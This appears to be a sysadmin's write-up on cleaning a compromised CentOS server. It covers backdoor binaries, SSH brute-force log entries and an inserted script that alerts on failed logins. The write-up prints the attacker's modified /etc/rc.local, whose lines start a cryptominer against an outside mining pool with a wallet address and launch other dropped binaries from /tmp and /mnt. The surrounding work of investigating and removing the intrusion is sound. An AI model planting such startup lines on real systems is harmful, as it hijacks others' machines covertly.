Attack type:
Mainly a backdoor, plus the host being used as a zombie (bot)
First deal with the backdoor:
Steps
(1) Find out where the backdoor files came from (how they were created)
(2) Delete the backdoor files
Concretely:
Use a timer (cron job) to delete the backdoor files periodically
Files to delete:
(a)/usr/bin/acpid
(b)/usr/bin/bsd-port/agent
Script the timer runs:
Timer:
How to deal with the zombie behaviour?
Check /var/log/secure; it shows the host really was hit with repeated login attempts:
- [root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq
- apache from 121.42.0.30
- ftp from 121.42.0.30
- invalid user admin
- invalid user test
- invalid user user
- mail from 121.42.0.30
- root from 121.42.0.30
Suspicious processes found:
How to improve security?
I think there should be a mechanism:
when a host is hit with a large number of login attempts it should raise an alert, e.g. send an email or an SMS
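Added example (not code from the page) of the alert mechanism proposed above: the same "Failed password" extraction as the grep/cut pipeline earlier, done in awk so that user and source IP are located by keyword rather than by field position, counted per source and per account, and compared against a threshold before anything is sent. The log lines are constructed in /var/log/secure layout; the hostname iZ25tti3rxdZ is the page's, the addresses, PIDs and times are made up, and the mail hook assumes a working local mail(1) and MTA.

```shell
#!/bin/bash
# Added example (not code from the page): alert on SSH brute forcing.
# Parses sshd "Failed password" records in /var/log/secure format, counts
# failures per source IP and per account, reports sources over a threshold.
# Assumes awk, sort and (for the mail hook only) a working local mail(1)/MTA.

# Constructed sample in /var/log/secure layout. The hostname iZ25tti3rxdZ is
# from the page; the addresses (RFC 5737 test ranges), PIDs and times are made up.
SAMPLE_LOG='Dec  7 11:20:01 iZ25tti3rxdZ sshd[4011]: Failed password for root from 203.0.113.7 port 40122 ssh2
Dec  7 11:20:03 iZ25tti3rxdZ sshd[4011]: Failed password for root from 203.0.113.7 port 40122 ssh2
Dec  7 11:20:05 iZ25tti3rxdZ sshd[4013]: Failed password for invalid user admin from 203.0.113.7 port 40130 ssh2
Dec  7 11:20:09 iZ25tti3rxdZ sshd[4015]: Failed password for invalid user test from 203.0.113.7 port 40141 ssh2
Dec  7 11:21:10 iZ25tti3rxdZ sshd[4020]: Failed password for apache from 203.0.113.7 port 40150 ssh2
Dec  7 11:22:30 iZ25tti3rxdZ sshd[4031]: Failed password for root from 198.51.100.20 port 51000 ssh2
Dec  7 11:23:00 iZ25tti3rxdZ sshd[4040]: Accepted password for root from 192.0.2.10 port 52000 ssh2'

# Read log text on stdin, print "count ip" for each source IP that produced
# failed password attempts, busiest first. The IP is taken from the word
# after "from", so "invalid user NAME" does not shift the field numbers the
# way it does for cut -f 9,10,11.
failed_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for / {
            ip = ""
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
            if (ip != "") n[ip]++
         }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Same per account. "invalid user NAME" means the account does not exist.
failed_by_user() {
    awk '/sshd\[[0-9]+\]: Failed password for / {
            user = ""
            for (i = 1; i <= NF; i++) if ($i == "for") {
                if ($(i + 1) == "invalid" && $(i + 2) == "user") user = $(i + 3)
                else user = $(i + 1)
                break
            }
            if (user != "") n[user]++
         }
         END { for (u in n) print n[u], u }' | sort -rn
}

# Print the source IPs with at least $1 failures, one per line (stdin = log).
bruteforce_sources() {
    failed_by_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

# Alert hook: mail the offending sources to $1 once any source reaches $2
# failures (default 20). Without mail(1) it only writes to stderr.
notify_admin() {
    local to="$1" ips
    ips=$(bruteforce_sources "${2:-20}")
    [ -n "$ips" ] || return 0
    if command -v mail >/dev/null 2>&1; then
        printf 'SSH brute force on %s from:\n%s\n' "$(hostname)" "$ips" \
            | mail -s "ssh brute force on $(hostname)" "$to"
    else
        printf 'would mail %s: SSH brute force from %s\n' "$to" "$ips" >&2
    fi
}

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | failed_by_ip
    printf '%s\n' "$SAMPLE_LOG" | failed_by_user
    printf '%s\n' "$SAMPLE_LOG" | notify_admin root@localhost 5
fi
```

On a real host the functions read the log on stdin (failed_by_ip < /var/log/secure); run notify_admin from cron with a threshold tuned to the host, since one or two failures per source are normal noise while dozens from one address within minutes are what the page's output shows.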
Look at .bash_history in root's home directory
Finally found the trick:
They also modified the core system file /etc/rc.local
So check the modification record of /etc/rc.local:
[root@iZ25tti3rxdZ ~]# stat /etc/rc.local
File: `/etc/rc.local'
Size: 390 Blocks: 8 IO Block: 4096 regular file
Device: ca01h/51713d    Inode: 787612   Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2016-01-10 16:34:59.807094407 +0800
Modify: 2015-12-07 11:23:07.160211728 +0800
Change: 2015-12-07 11:23:07.160211728 +0800
Modify and Change both read 2015-12-07 11:23:07, so that is when the file was maliciously modified. (mtime can be back-dated with touch, ctime cannot, so the two agreeing is what makes this timestamp trustworthy.)
Now look at what it was changed to:
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
/tmp/minerd -a scrypt -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk
/mnt/linsx
/mnt/linsx
/mnt/linsx
/mnt/linsx
/tmp/linex
/tmp/linex
/tmp/2897
/tmp/2897
Normal version:
Fix (note these only comment the lines out; the binaries they start, /tmp/minerd, /mnt/linsx, /tmp/linex and /tmp/2897, still have to be killed and removed):
sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local
Abnormal processes (the genuine acpid daemon on CentOS is /usr/sbin/acpid and belongs to the acpid package; rpm -qf /usr/bin/acpid reports that this copy is not owned by any package):
[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep
root 16790 1 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16804 16790 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16805 16804 0 16:48 ? 00:00:00 /usr/bin/acpid
How to kill the abnormal processes:
- ps -ef | grep '[/]usr/bin/acpid' | awk '{print $2}' | xargs -r kill -9
- ps -ef | grep '[/]usr/bin/bsd-port/agent' | awk '{print $2}' | xargs -r kill -9
The commands above are run from the timer (cron), every 10 minutes.